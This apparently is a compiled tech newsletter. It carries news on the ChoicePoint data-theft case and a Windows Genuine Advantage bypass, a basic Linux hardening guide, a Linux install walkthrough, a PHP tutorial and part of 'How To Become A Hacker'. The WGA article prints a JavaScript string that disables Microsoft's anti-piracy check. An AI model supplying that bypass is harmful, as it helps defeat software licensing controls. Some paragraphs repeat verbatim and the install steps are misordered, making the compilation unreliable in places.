ChoicePoint hacker indicted The man who received 16 months jail time for dealing in personal information taken from ChoicePoint has now also been indicted for fraudulently accessing consumer financial records.

Nigerian Oluwatunji Oluwatosin could face up to 22 years in prison if convicted of the new crimes. Prosecutors believe 1,500 people were affected by the so-called data theft with up to 150,000 others also at risk.

"The 22-count grand jury indictment unsealed today represents one of the largest cases of identity theft ever prosecuted in Los Angeles County," said Los Angeles County District Attorney Steve Cooley speaking to Reuters.

In March SC reported consumer data-mining company ChoicePoint had informed 35,000 Californians their data could have been compromised, as part of the new disclosure law Californian Senate Bill 1386.

Over the next month a wave of industry and privacy pressure forced the embattled company to reveal the full extent of the security breach. Eventually CEO Derek Smith apologized for his company's lack of security to a House Energy and Commerce Subcommittee.

According to reports, the U.S. government is widening its search for the culprits that targeted ChoicePoint and there may soon be more arrests.

Hackers Crack Microsoft's Antipiracy System Windows Genuine Advantage system first exploited within 24 hours of its launch.

Microsoft says that hackers managed to bypass a process it had implemented several days ago to ensure that users of Microsoft's update services possessed legitimate copies of Windows before they could download updates and content from those services.

A posting on the Boing Boing blog claimed that a JavaScript command string could bypass a check that Microsoft instituted Wednesday through the Windows Genuine Advantage 1.0 program.

According to the posting, users can override the WGA by pasting the string javascript:void(window.g_sDisableWGACheck='all') in the address bar of their browser and pressing Enter. The code "turns off the trigger for the key check," according to the blog posting.

Quick Work

The WGA program requires users to run a program verifying that their Windows operating system is not pirated, before they can use Microsoft's software update services. Microsoft had been running it as a pilot program since September 2004 but made the validation system a requirement just last Wednesday.

A Microsoft spokesperson conceded on Friday that hackers had indeed succeeded in cracking the WGA program, but said that the software giant will fix the flaw they exploited in an upcoming version of the WGA program.

The exploit came soon after Wednesday's launch of the program, the spokesman said. "Within 24 hours, hackers claimed to have circumvented the process and it appears that they did," he said. "This is a hack that exploits a feature that enables repeat downloads in the same session so that a hacker never has to validate as a genuine user," he said.

The move to lock out pirated copies of Windows from the update sites is part of Microsoft's effort to fight software piracy, a major issue for the software vendor.

Easy Hack?

The Boing Boing hack is not the only way to get around WGA's restrictions.

David Keller, founder of PC consulting and services firm Compu-Doctor in Cape Coral, Florida, was able to change his Internet Explorer settings to bypass WGA when he ran into a flaw in the program that flagged a legitimate product key on a customer's Windows XP Professional Service Pack 2 as invalid.

"The customer was the original owner, no hardware was changed since purchase, nor was Windows ever reinstalled on the system," Keller said in an e-mail to the IDG News Service. WGA had rejected the operating system, nevertheless, thereby preventing Windows Update from working, he said.

Keller wrote that he did not have much luck with Microsoft support technicians, so he found a way to bypass the validation process on his own and moved along with the update. He accomplished this by disabling the Windows Genuine Advantage add-on within his browser's Internet Options. By clicking on Tools/Internet Options/Programs/Manage Add-ons, Keller disabled the WGA add-on. He then exited Internet Explorer and was able to do a Windows Update without completing the validation step.

Source:

The Basics of Linux Network Security

Linux as a server offers all kinds of facilities like ftp,

WWW, and mail. The way that it handles many of these services is via a system of ports. Port 21 controls ftp, for example. (If you are interested, the mapping of port numbers to service names is in the file /etc/services.)

To save on system resources and make system administration less complex, many services are handled through a configuration file /etc/inetd.conf. This file tells the system how to run each of the available services.

Many Linux vendors turn on various services in inetd.conf by default when for maximum security they should be off! In many corporate environments security as such is not an issue. If there is enough security to prevent accidental damage in these 'soft' environments providing access to these services is more important than preventing them. If your Linux host is exposed to the Internet you may hold a different point of view though. To check what services are currently running on your Linux system, type the command

netstat -vat

This will print up something like this

tcp 0 0 *:6000 *:* LISTEN tcp 0 0 *:www *:* LISTEN tcp 0 0 *:auth *:* LISTEN tcp 0 0 *:finger *:* LISTEN tcp 0 0 *:shell *:* LISTEN tcp 0 0 *:sunrpc *:* LISTEN

Each line that says LISTEN is a service waiting for connections. Some of these services run as stand-alone programs, but many of them are controlled by /etc/inetd.conf. If you are not sure what a service does, look it up in /etc/inetd.conf. For instance, if you type

grep '^finger' /etc/inetd.conf

you will get back a line from inetd.conf like this

finger stream tcp nowait nobody /usr/sbin/tcpd /usr/sbin/in.fingerd

Averting Break-Ins

Introduction

The Internet has become a hazardous place, in the last few years. As the traffic increases and more important transactions are taking place your risk grows as bad guys try to damage, intercept, steal or alter your data.

If there is something worth stealing then someone will try and steal it. Linux-based systems have no special exclusion from this universal rule. A primary reason that Linux systems are so popular is because they are robust and have many sophisticated security measures.

As the manager of a Linux system for your department or small business, you might feel a bit daunted by all of these threats. You've heard Linux is supposed to be secure, but how do you make sure?

It is a truism, of course, that if you don't use the Linux security tools provided, then you should be ready for the inevitable break-in. Problems can also be caused by badly implemented security measures. Securing a Linux machine can get pretty complicated and entire shelves of books have been dedicated to the subject.

You may not have the time or the motivation to delve into all of those tomes, so we're going to make this a bit simpler.

There are several methods remote attackers can use to break into your machine. Usually they are exploiting problems with existing programs. The Linux community always quickly spots these 'exploits' and releases a fix. Linux fixes are usually out long before the equivalent programs in other operating systems are mended. The issue here though is how to prevent your machine from suffering any sort of problem of this sort.

There are several methods remote attackers can use to break into your machine. Usually they are exploiting problems with existing programs. The Linux community always quickly spots these 'exploits' and releases a fix. Linux fixes are usually out long before the equivalent programs in other operating systems are mended. The issue here though is how to prevent your machine from suffering any sort of problem of this sort.

To see what the program does, look up in.fingerd in the man page. If you think you can live without this service, then it can be turned off in /etc/inetd.conf. By commenting out the line (put a # at the start of the line) and then issuing the command kill all -HUP inetd you can immediately and permanently turn a service off. There is no need to reboot.

If a service is not listed in /etc/inetd.conf then it probably runs as a stand-alone program.

You can remove a service provided by a stand-alone background program by uninstalling its package. Only do this if you are sure about what the program does and are certain that it is not necessary.

Keep Out The Prying Eyes With Ssh (Secure Shell System)

To add extra security to the various services, Linux has a system for allowing and denying them to chosen hosts. For instance, you may wish to allow logins from machines at your own site, but not from the Internet. The files /etc/hosts.allow and /etc/hosts.deny list allowed services and hosts. The method of denying connections by checking the host provides a good basic method for throwing off attacks. But it is not the end of the story. It is possible to fake host names on incoming connections ( oh yes it is ). While data is in transit between programs over the Internet it is also in danger. Anyone with the knowledge can look at your data. Using a method known as 'spoofing' they can even inject fake data into a legitimate stream. These problems come about because of the way that Internet protocols interact. To overcome these difficulties ssh was devised.

Ssh is a stable, well-developed system with open source that provides encryption and authentication on connections. Encryption is using codes to protect the packets of data while in transit. Authentication is a process for verifying if a.packet of data or a connection is valid. There are ssh clients for most other operating systems too. By using Linux as a server you can provide ssh level security for all your network use.

Monitoring Programs and Where/What They Log

Linux has a comprehensive set of subsystems to let the systems administrator know what is going on with his or her system. All manner of log files are generally kept in the /var/log directory. Most of the standard services log information to /var/log/syslog and /var/log/messages about users connecting to them or attempting to connect. There are also log files for such services as apache (/var/log/httpd/access_log), mail (/var/log/mail) and firewall (/var/log/firewall).

The main problem with logging events is that one tends to end up with too much data. So careful filtering and only logging important information is important.

There are some good tools out there that will make this work easier.

Ethereal is a packet sniffer. With it you can capture various types of packets over a given period of time. It also shows all manner of information about the packets. It's useful for watching packets coming into and going out of your machine. Generally it will detect traffic on your network segment.

Monitoring Programs and Where/What They Log

Linux has a comprehensive set of subsystems to let the systems administrator know what is going on with his or her system. All manner of log files are generally kept in the /var/log directory. Most of the standard services log information to /var/log/syslog and /var/log/messages about users connecting to them or attempting to connect. There are also log files for such services as apache (/var/log/httpd/access_log), mail (/var/log/mail) and firewall (/var/log/firewall). The main problem with logging events is that one tends to end up with too much data. So careful filtering and only logging important information is important. There are some good tools out there that will make this work easier.

Ethereal is a packet sniffer. With it you can capture various types of packets over a given period of time. It also shows all manner of information about the packets. It's useful for watching packets coming into and going out of your machine. Generally it will detect traffic on your network segment.

Another logging/intrusion detection type tool is called Tripwire. It takes a snapshot of your important system files and records their signature in a database. Various signature levels are available from mild to wild. You can also set the rules in a policy file to tell Tripwire what to check. After the database is initialized and signed Tripwire can be executed whenever you need to check the integrity of your system. The report will point out when your files are changed and the severity of the security risk. The Tripwire report is pretty easy to read and can be customized according to your file tracking needs. Why not set Tripwire up to run every day, early in the morning and have a report ready to look at, with your first cup of coffee?

A popular program for detecting access attempts (via the network) and port scans is Snort. The program produces files that log these types of activities and even gives some idea of where to find out more information. Of course, then you have the same problem as with other log files. It gets tough for a busy system administrator to review all the log files on a regular basis.

Stop The Evil Forces Of The Internet With Firewalls

A firewall is a device that protects a private network from the wider Internet. The simplest form of firewall is a Linux machine with one network connection ( an Ethernet card or modem ) connected to the Internet and the other connected to the private network. The Firewall computer can reach the protected network and the Internet. This traffic between the protected network and the Internet is controlled, in both directions by a list of rules. These rules can be customized for your needs. CoyoteLinux.com has a firewall system that fits on a floppy and doesn't need a hard disk to run. It's design specifically to address the need for an easy to install no-nonsense Linux firewall. You might take a look at running a hardware firewall appliance. These devices are small routers or switches that have built-in firewalls. They generally allow limited setup of rules to allow packets to pass back and forth. They don't provide as much flexibility for rules as dedicated Linux firewalls. Usually the availability is good with some even being equipped with four or more RJ-45 ports and a wireless access point, all for around $100.

All data flowing to and from the Internet and the private network is filtered by the firewall. Inside the private network less care needs to be taken with turning off services and the like. It is a way of concentrating effort on making one machine secure and protecting many others in the process. The methods for correctly setting up firewalls are quite complex. First you have to configure your machine for two Ethernet cards. Then you have to use the IP-chains/IP-tables software to set up filters which connect the two Ethernet cards data links.

The main drawback with making your systems more secure is that they become less accessible. The idea behind ramping up your system's security is to stop use of your computers, by crooks, thieves and malcontents. Before implementing any of the ideas in this article you should consider carefully the opposite side of the coin: the systems are there to be used by your users! Linux has a wide range of security tools and by carefully combining various techniques and programs, you should be able to come up with a good balance between ready access and system security.

My First Linux Server, Part 1

Easy Linux, Easy

Many small businesses are turning to Linux as way to swim against the tide of rising software costs. Are you thinking about diving into Linux for your small business? From the outside, Linux can appear to be a deep ocean of strange jargon in unchartered waters. Who has the time to wade through all that to save a few clams? With Linux, it's not a sink or swim proposition.

Linux is now a lot simpler than you may think. We can provide you with the easiest, simplest, no-problem process for installing Linux on a PC. After going through this simple installation process, you will have a basic machine that you can configure into any kind of server, workstation, or office desktop. Future articles in this My First Linux Server series will help you build productive, Linux-based servers and small office workstations.

The best choices for your first Linux machine are probably the popular Red Hat Linux or SUSE Linux, primarily because both are easy to install and configure. Additionally, these companies are sound choices for the home office or small business. Both vendors have specialized in Linux for many years and offer full corporate product lines supporting your expansion.

Red Hat, for example, has an extensive library of recent third-party English documentation, while SUSE is better documented in European languages. (As recently announced, Red Hat has discontinued support for Red Hat Linux 9.0, so security updates will no longer be available. But you can still learn the basics with version 9.0 and you can upgrade to supported versions when you need a more secure production system.)

Step 1: Buy CDs, Please

Linux is set up for CD-ROM installation. Of course, you can download your Linux software from many free sources and burn your own CDs. But the download is big--up to 3 GBs--and it takes time to burn a full set of CDs. Do it the easy way and eliminate problems with interrupted downloads or CD data errors. Go to eBay and buy good quality CDs from established sellers like "The Linux Store" and pay about $1.00 per CD, plus shipping. Or go to Linux CD and pay about $2.00 a CD plus shipping. You might have to look carefully to find RedHat here. At such inexpensive prices, the vendor is making no money, so you do not qualify for free vendor support. These are low-end products, but they do contain all the small business server and office software you need to get started. If you need or want someone to call on in case of technical difficulties, pay more and buy from Red Hat, SUSE, or other established Linux vendors. Step 2: Prepare the Box

Any leftover, surplus, outmoded, underpowered PC is perfect for your first Linux server project. Linux runs on any Intel 386, 486, Pentium (called i586), Pentium II (called i686) and newer platforms, as well as many other CPUs. 128 MB RAM is quite adequate for a test system, and you will need around 10GB of hard disk space. The purpose of this exercise is to quickly build a Linux platform and then learn the basics of configuring a useful small business server. Then you can repeat the process on larger, faster platforms for go into heavy server production. While you wait for the CD shipment to arrive, it is well worth it to clean up the PC as much as possible. You can keep Windows applications intact if you wish, and you will be able to use this computer for both Windows and Linux. Minimize the Windows footprint on the system by removing all unnecessary applications and files, and back up any files you might need later. Clean up the registry, defragment the disks and run a careful virus scan. Also note that you may need Linux drivers for some of the cards and devices you have installed, so make a paper list of manufacturers and model numbers of all of the cards, CD drives, hard disks and motherboard. (Note that a driver is just a small piece of software that links the operating system to other devices such as printers and hard disks). The Linux CDs probably have the correct drivers for these devices, but if you need to search for a Linux driver, the list comes in handy.

Step 4: Feed CDs and Enjoy

There is no user interaction for these CDs--just insert the next CD and go do something more productive than watching software copying. After all of the applications load, the installer program takes you through a few easy configuration screens. Finally, the system reboots and brings up the boot selection screen. If you selected Linux to be the default OS; the new login screen automatically appears.

Congratulations, Linux is live! Take some time to get familiar with the new look and layout of a Linux system. Explore the configuration tools, and surf the Linux sites. The adventure begins.

In the second article in this series next week, we will configure the PC to perform as simple file server suitable for home office and small business networks.

Look out for future issues of WareZ News Magazine to learn more about linux!

The Linux installation starts by booting from a CD, so the CD-ROM drive must be the first boot source your computer looks for. This may entail changing some settings in what is called the BIOS—Basic Input/Output System--this can be likened in some ways to the starter motor in a car. The BIOS is what makes a turned off computer come to life. Go into the BIOS settings and change the boot sequence to put the CD-ROM drive first. It may sound complex, but it is relatively simple. If this gives you any trouble, any somewhat technically inclined associate should be able to sort it out for you in 30 seconds. Step 3: Install First CD

Load up the Linux! Place the first Linux CD in the drive and reboot the computer. When the screen comes up, you know Linux has found drivers for your monitor, video board, and keyboard. The installer program sequences are different for each vendor, but SUSE and Red Hat give you a workable system if you choose the default settings and keep it simple. Later, after some experience, you can optimize the system for workstation or server use. Step through the screens and selections, taking the default settings and simplest choices. Read the Help text for each screen to get familiar with configurations. The keys to keeping things simple are:

• Accept default selections when in doubt • Install all the software

Points to watch for Red Hat: Choose "Custom" to allow installing all software, but when you see the Disk Partitioning Setup screen, be sure to choose "Automatic Partition." Points to watch for SUSE: Accept the disk-partitioning proposal. For software selection, choose "Detailed Selection" and select all software. And please, remember to write down your IDs and passwords, because it is not easy for the novice to re-set them. There is a final choice of whether to proceed with the installation or cancel it. Until this point, nothing has been written to disk, and you can cancel out of the installation without changing the disks in any way. You can cancel right now and go back through the installation again, choosing different options. When you finally summon the courage to make that last click, the disk partitioning and data writes begin. The installer program does an automatic reboot and then requests the remaining CDs to finish the install process.

The easy way to learn PHP -part 1 –

What is PHP?

PHP is an interpretted language that has similarities to C. PHP scripts are written and typically saved with a file extension of .php . These PHP scripts can be run by a webserver (i.e. MicroSoft Internet Information Services or Apache) for use on a web page, or from the command line if PHP is configured this way.

An example of PHP in use is on this webpage. If you look at the URL address of this page, you will notice the following:

www.vcvtech.com/index.php

The file, index.php, is a PHP script that helps serve the pages of the website.

What do I need to program with PHP?

In order to program with PHP, you will need a good text editor - preferably one that recognizes when PHP code is being typed. These 'PHP aware' editors allow for the user to easily distinguish between PHP code, and other types of code, such as Javascript or HTML, typically by color coding and bolding the text of each type, differently. A good example of a freeware editor is HTML-Kit (www.chami.com), which was used for a majority of the programming work on this website. It is also recommended that you have access to PHP by installing it with a webserver, either on a Linux system, or a MicroSoft Windows-based workstation. Better yet, use a web hosting provider that provides PHP as one of its services with it web hosting package. It is easy and useful to learn PHP in conjunction with MySQL, and Apache or IIS, which is typically available with web hosting services.

What kind of programs can I create with PHP?

PHP is typically used in conjunction with a web server and a database, such as Apache (www.apache.org) and MySQL (www.mysql.org), in order to assist in displaying dynamic web pages.

PHP has been used to create shopping carts, address books, photo galleries, contact lists, catalogs, user forums, and many other types of content on the web. The uses of PHP are endless. Since PHP can also be run from the command-line, it is possible to use PHP to do server administrative tasks, or run PHP scripts from cronjobs. PHP Examples To give you an idea of what the PHP language looks like, as mentioned, it looks similar to C, as it requires a semi-colon to close each command line of code. The characters (together they're called a tag) open and close your PHP script, which may be contained in a text file by itself, or in the middle of some HTML code. These tags tell the web server to begin translating PHP code. An example of PHP is listed below: <? echo "Hello World";?> The example script above, if it were saved in a file and called upon by the webserver, it would display "Hello World" on an otherwise blank page. if...Then statements look like the following: <? $flag = $_POST["answer"]; if($flag==true) { echo "It is TRUE!!!"; } else { echo "It is absolutely, FALSE!!! Get out of here and don't come back till it is TRUE!!!"; } ?> The above example leaned a bit toward the dramatic side, but illustrates how closely PHP resembles C. It is of the author's opinion that if a programmer is proficient in C, of which many of PHP's commands are copies of, then PHP should be easy to learn by that programmer. Otherwise, PHP is still a good language to learn, but it is advised that as one first begins to learn PHP, that he or she has a good tutor or book to refer to in order to avoid getting into bad habits, such as creating spaghetti code that lumps all of a programs functionality into one long script, instead of segregating it into seperate, re-usable functions. The topic of PHP writing style is beyond the scope of this article, but will be covered in another tutorial.

What other resources are available to learn PHP?

The web is full of resources to be looked up to learn programming PHP. PHP's official site, www.php.net has a searchable index of all of PHP's commands, and there are dicussions posted with each command, that give further details and examples of the command's usage. Other websites worth taking a look at include the following:

www.devshed.com

www.w3schools.com

www.php-scripts.com

www.phpbuddy.com

www.webmonkey.com

This list should be enough to get you started.

The Basics of PHP

In order to use PHP, you must learn some basic syntax of how PHP is used. This article is not a beginner’s guide to programming. It is assumed that the reader has some previous programming experience with other languages such as BASIC, C, or Fortran. Nonetheless, it may be possible for the quick learner to learn how to program with PHP, by reading and utilizing examples.

PHP Variables

The syntax used for variables in PHP requires that variable names be preceeded by a dollar sign($). Variable names can start with a letter or underscore, and may have numbers,letters, or underscores, following. Variable names in PHP are case sensitive – an important point to remember if you’re modifying some PHP code.

Variables are assigned values by using the ‘equal’ sign – a standard practice in most common programming languages. For example, to set $a to equal ‘5’:

$a = ‘5’;

We may set $b to equal 5.

$b= 5;

PHP decides the type of variable depending upon the value that is being assigned. Addition of $a + $b results in an error. However, if you are performing a string function, such as concactenation, PHP automatically converts numeric variables to strings.

Concactenation within PHP is simple, as it only requires a period(.) between the strings being concactenated. For example:

$string = $a.” + “.$b;

A string may also be concactenated using the following convention:

$string .= $a;

$string .= “ is the value of a”;

A numeric variable may be similarly be incremented as demonstrated:

$number++;

or use

$number+=$b;

Finally, it should be mentioned that PHP variables may be set to values, or references to other variables that are already set with values. These are considered reference variables, similar to those used in the C language, in which the variable doesn’t actually contain the value of the variable it is pointing to, but it is only JUST a pointer or reference. You can also consider it an alias of the variable, as a another means to describe it. By using reference variables, such as when pointing to an array or a object (objects will be discussed in another tutorial), the whole array or object doesn’t have to be copied again – rather the reference variable points at the variable’s location in memory (Remember, it is memory, typically RAM, that contains all your variables, besides your PHP code when you run your PHP script!).

PHP Arrays

PHP arrays are used very similarly to those in BASIC, except you do not need to dimension them in advance. PHP also provides an immense number of array functions, that provide great power to their usage. Volumes could be written on the various uses of PHP arrays, but it is probably better to reference www.php.net/arrays to gather more information on more complex topics of arrays, that will not be covered in this basic tutorial. PHP arrays are already set to receive an infinite number of items. The syntax for setting your PHP array is as follows:

$my_array[0] = “This is a test”;

Interestingly, values may be appended to this array by using two closed, empty brackets as shown by the following: $my_array[] = “This is another test”; $my_array[]=”Hey Mom, isn’t this cool?!”;

PHP will append a value to the next available slot of your array. PHP maintains an index of each array.

A useful function to view the contents of an array is print_r, as seen below:

print_r($my_array);

Output:

$my_array Array( [0]=>”This is a test”;[1]=>”This is another test”;[2]=>”Hey Mom, isn’t this cool?!”;)

Notice that print_r displays the key value of the array followed by the value itself (i.e. the key value of 0, is between the brackets, listed as [0]). It is interesting to note that PHP arrays can have key values that are non-numeric. For example, you can set the following array:

$my_new_array[‘test’] = “this is a test”;

If you do a print_r, you will see that [‘test’] appears as a key value. One of the greatest attributes of PHP is that it allows you to create keys from words so that your keys can have descriptive meanings or be more easily linked to fields in a database or from $_POST data from a form.

If you use closed brackets after your array names, and do not specify a key value when inserting values into the array, you should be aware of the pitfalls you may encounter. PHP Array pitfalls will be covered in the next chapter.

PHP Array Pitfalls To Avoid I was helping an up an coming PHP developer at the office the other day - it happened to be his birthday and he was in a hurry to leave for a dinner engagement with his family. Unfortunately, he was wrestling with PHP and its handling of arrays. I recognized the problem immediately, recounting my own experiences with getting $_POST data from a form with checkboxes and several text input fields, and expecting the data to line up perfectly with some corresponding data from a MySQL database.

The reason he was experiencing a problem was that as he was having data input into a form on his website into an HTML array variable called data[] , he was hoping that the 3rd instance of the field on his form would also be put into the 3rd slot of his PHP array, which he called $formdata[] .

Unfortunately, when you have a closed bracket array, items are added to the next available indexed key value of the array. This is true for both HTML and PHP. Thus, if he had 3 fields on his form using data[], and when the HTML is displayed in the browser, the user fills in the 3rd field on the form, data[0] will contain the value - not data[3]. Therefore, if you want to retrieve data from a form with array variables, it is better to specify the key each array.

PHP IF... THEN Statements

To use IF..THEN.. and ELSE within PHP, the following example is provided, in which we will test to see if a variable $flag is set to TRUE.

if ($flag == TRUE) { echo “The flag is set to TRUE”; } else { echo “The flag is not set to TRUE”; }

Notice that we used a double equal sign as a comparison operator. PHP requires this syntax as it would consider $flag=TRUE to mean that we’re trying to set the variable instead of performing a condition. For more information on PHP’s comparison operators, click here to reach the ‘comparison operator’ section of the PHP manual at www.php.net.

More in the next issue!

An example in which an array would be used on a form and then used by PHP is listed below, in which we have an online quiz form. <HTML> <BODY> <FORM name="form" method="post" action="process.php"> <H4>What is my favorite food(s)? (Check all that apply)</H4> <a>Cheeseburger? A.<input name="answers[A]" type="checkbox"></a><BR> <a>Hot Dots? B.<input name="answers[B]" type="checkbox"></a><BR> <a>Tacos? C.<input name="answers[C]" type="checkbox"></a><BR> <a>Chicken? D.<input name="answers[D]" type="checkbox"></a><BR> <button type="submit">Submit</button> </FORM> </BODY> <HTML>The PHP script that retrieves and processes the information is below:

<?

$correct_answers_array = array("A","B");

$answerstring=implode(",",$correct_answers_array); $correct_flag= true; $posted_answers = $_POST['answers'];

foreach($posted_answers as $key=>$value) {

if ($correct_flag != False ) {

$correct_flag = True; }

if (!in_array($key,$correct_answers_array )) { $correct_flag = false; echo "false"; } else { unset($posted_answers['$key']);

}

}

if ($correct_flag==True and count($_POST['answers'])==count($correct_answers_array)) {

echo "YOU 100% RIGHT!<br>";

} else {

echo "You were not 100% correct…I’m very disappointed in you.<BR>";

echo "The correct answer should have been ".$answerstring.".<BR>";

} ?>

How To Become A Hacker What Is a Hacker?

The Jargon File contains a bunch of definitions of the term "hacker", most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant.

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term 'hacker'. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.

The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music --- actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them 'hackers' too --- and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term 'hacker'.

There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people 'crackers' and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word 'hacker' to describe crackers; this irritates real hackers no end.

The basic difference is this: hackers build things, crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

The Hacker Attitude

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you --- for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters --- not just intellectually but emotionally as well.

Or, as the following modern Zen poem has it:

To follow the path: look to the master, follow the master, walk with the master, see through the master, become the master.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing

themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.

If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.

You also have to develop a kind of faith in your own learning capacity --- a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece --- and so on, until you're done.)2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do --- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice --- nobody who can think should ever be forced into a situation that bores them.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by --- and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.

(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)

Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing --- they only like 'cooperation' that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.

Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence --- especially competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.

If you revere competence, you'll enjoy developing it in yourself --- the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

Basic Hacking Skills

The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.

This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:

1. Learn how to program.

This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site.

Java is also a good language for learning to program in. It is more difficult than Python, but produces faster code than Python. I think it makes an excellent second language.

But be aware that you won't reach the skill level of a hacker or even merely a programmer if you only know one or two languages --- you need to learn how to think about programming problems in a general way, independent of any one

language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages.

If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.

C is very efficient, and very sparing of your machine's resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today's machines as powerful as they are, this is usually a bad tradeoff --- it's smarter to use a language that uses the machine's time less efficiently, but your time much more efficiently. Thus, Python.

Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don't require C's machine efficiency. You will need to be able to understand their code.

LISP is worth learning for a different reason --- the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor.)

It's best, actually, to learn all five of these (Python, Java, C/C++, Perl, and LISP). Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.

I can't give complete instructions on how to learn to program here --- it's a complex skill. But I can tell you that books and courses won't do it (many, maybe most of the best hackers are self-taught). You can learn language features --- bits of knowledge --- from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code.

Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more - and repeat until your writing begins to develop the kind of strength and economy you see in your models.

Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic?

2. Get one of the open-source Unixes and learn to use and run it. I'm assuming you have a personal computer or can get access to one (these kids today have it so easy :-)). The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes, install it on a personal machine, and run it.

